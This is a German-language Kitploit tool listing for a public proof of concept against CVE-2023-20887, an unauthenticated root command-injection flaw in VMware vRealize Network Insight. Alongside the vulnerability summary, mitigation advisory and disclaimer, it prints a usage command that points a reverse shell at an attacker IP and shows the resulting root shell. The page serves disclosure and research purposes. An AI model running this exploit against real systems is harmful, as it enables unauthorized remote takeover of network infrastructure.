Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-20887 — VMWare vRealize Network Insight vorauthentifizierte RCE (CVE-2023-20887) | Kitploit
Tools/GitHubGitHub/sinsinology/cve-2023-20887
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubsinsinology/cve-2023-20887

CVE-2023-20887

VMWare vRealize Network Insight vorauthentifizierte RCE (CVE-2023-20887)

Repository anzeigen
22941vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2023-20887

POC für CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) nicht authentifizierte RCE

Technische Analyse

Eine Ursachenanalyse der Schwachstelle ist in meinem Blog zu finden: https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

poc

Zusammenfassung

VMWare Aria Operations for Networks (vRealize Network Insight) ist anfällig für Befehlseinschleusung (Command Injection), wenn Benutzereingaben über die Apache Thrift RPC-Schnittstelle akzeptiert werden. Diese Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebige Befehle auf dem zugrunde liegenden Betriebssystem als Root-Benutzer auszuführen. Die RPC-Schnittstelle wird durch einen Reverse Proxy geschützt, der umgangen werden kann. VMware hat die Schwere dieses Problems als kritisch eingestuft, mit einem maximalen CVSSv3-Basiswert von 9,8. Ein Angreifer kann eine Remote-Codeausführung im Kontext von 'root' auf dem Gerät erlangen. VMWare 6.x Versionen sind anfällig.

Verwendung

root@kitploit:~
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release

Gegenmaßnahmen

Aktualisieren Sie auf die neueste Version oder mildern Sie die Schwachstelle durch Befolgen der Anweisungen im Progress Advisory.

  • https://www.vmware.com/security/advisories/VMSA-2023-0012.html

Folgen Sie uns auf Twitter für die neuesten Sicherheitsforschungen:

  • SinSinology
  • SummoningTeam

Haftungsausschluss

Diese Software wurde ausschließlich zu Zwecken der akademischen Forschung und zur Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, außer wenn dies ausdrücklich genehmigt wurde. Die Projektbetreuer sind nicht verantwortlich oder haftbar für Missbrauch der Software. Verwenden Sie sie verantwortungsbewusst.

Tool herunterladen